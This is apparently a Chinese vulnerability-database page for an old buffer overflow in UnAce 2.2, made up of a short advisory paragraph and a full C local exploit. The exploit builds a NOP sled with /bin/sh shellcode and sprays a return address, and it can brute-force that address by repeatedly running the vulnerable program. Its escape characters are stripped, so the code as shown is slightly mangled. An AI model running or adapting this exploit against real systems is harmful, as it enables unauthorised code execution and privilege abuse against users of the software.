Winace UnAce 2.2 – Command Line Argument Buffer Overflow (2)
漏洞ID | 1054242 | 漏洞类型 | |
发布时间 | 2003-11-10 | 更新时间 | 2003-11-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9002/info
UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.
/*Local exploit for unace v2.2 by Li0n7
*Bug reported by Andreas Constantinides <[email protected]>
*contact me: [email protected]
*visit us: ioc.fr.st
*tested on slackware 9.0
*usage: ./unace-exp[-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]
*-r <RET>: try to exploit unace with specified <RET> as return address
*-b: enables bruteforcing
*-s: specify the first address to bruteforce
*-d: the value to take away from the starting address at each bruteforcing iteration
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>
#define BSIZE 600
#define SIZE BSIZE*2
#define D_DIFF 1
#define D_START 0xbfffffff
#define PATH "/tmp/test/exploits/src/unace"
#define RET 0xbffff73a
char shellcode[]=
"x31xc0x50x68//shx68/binx89xe3"
"x50x53x89xe1x99xb0x0bxcdx80";
char *buffer,*ptr;
void exec_culn();
int tease();
int make_string(long ret_addr);
int bruteforce(long start,int diff);
void banner(char *argv0);
int
main(int argc,char *argv[])
{
char * option_list = "bd:r:s:";
int option,brute = 0,opterr = 0,diff = D_DIFF;
long ret,start = D_START;
banner(argv[0]);
if (argc < 1) exit(-1);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'd':
diff = atoi(optarg);
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(0);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option '%c' invalidn",optopt);
banner(argv[0]);
exit(-1);
}
if(brute == 1)
bruteforce(start,diff);
return 0;
}
void
exec_vuln()
{
execl(PATH,PATH,"e",buffer,NULL);
}
int
tease()
{
pid_t pid;
pid_t wpid;
int status;
pid = fork();
if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()n", strerror(errno));
exit(13);
} else if ( pid == 0 ) {
exec_vuln();
} else {
wpid = wait(&status);
if ( wpid == -1 ) {
fprintf(stderr,"[-] %s: wait()n", strerror(errno));
return 1;
} else if ( wpid != pid )
abort();
else {
if ( WIFEXITED(status) ) {
printf("[+] Exited: shell's ret code = %dn", WEXITSTATUS(status));
return WEXITSTATUS(status);
} else if ( WIFSIGNALED(status) ) {
return WTERMSIG(status);
} else {
fprintf(stderr, "[-] Stopped.n");
}
}
}
return 1;
}
int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;
buffer = (char *)malloc(SIZE);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...n");
exit(-1);
}
ptr = buffer;
memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);
for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];
addr_ptr = (long *)ptr;
for(i=0;i<100;i++)
*(addr_ptr++) = ret_addr;
ptr = (char *)addr_ptr;
*ptr = 0;
return 0;
}
int
bruteforce(long start,int diff)
{
int ret;
long i;
fprintf(stdout,"[+] Starting bruteforcing...n");
for(i=start;i<0;i=i-diff)
{
fprintf(stdout,"[+] Testing 0x%x...n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%xn",i);
break;
}
}
return 0;
}
void
banner(char *argv0)
{
fprintf(stderr,"n local exploit for unace v <= 2.2 by Li0n7n");
fprintf(stderr," vulnerability reported by Andreas Constantinides <[email protected]>n");
fprintf(stderr," visit us: http://www.ioc.fr.stn");
fprintf(stderr," contact me: Li0n7[at]voila[dot]frn");
fprintf(stderr," usage: %s [-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]nn",argv0);
}
相关推荐: Big Nose Bird BNBSurvey 安全漏洞
Big Nose Bird BNBSurvey 安全漏洞 漏洞ID 1207246 漏洞类型 其他 发布时间 1998-12-03 更新时间 1998-12-03 CVE编号 CVE-1999-0936 CNNVD-ID CNNVD-199901-070 漏洞…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666